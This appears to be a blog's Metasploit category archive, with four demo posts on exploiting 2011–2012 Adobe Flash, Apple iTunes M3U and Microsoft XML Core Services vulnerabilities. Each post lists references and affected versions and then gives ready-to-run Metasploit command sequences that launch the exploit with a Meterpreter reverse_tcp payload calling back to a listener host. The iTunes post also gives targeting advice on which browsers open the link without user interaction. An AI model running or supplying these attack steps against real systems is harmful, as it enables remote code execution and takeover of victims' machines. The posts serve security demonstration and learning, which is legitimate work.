Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-2110 / APSB11-18 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2011-06-14
Details of the vulnerability provided the 2011-10-09
Metasploit PoC provided the 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2012-05-04
Details of the vulnerability provided the 2012-05-06
Metasploit PoC provided the 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability fixed, without notice of the vulnerability, in product the 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability the 2012-06-20
Metasploit PoC provided the 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes will copy the content after “#EXTINF:” without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid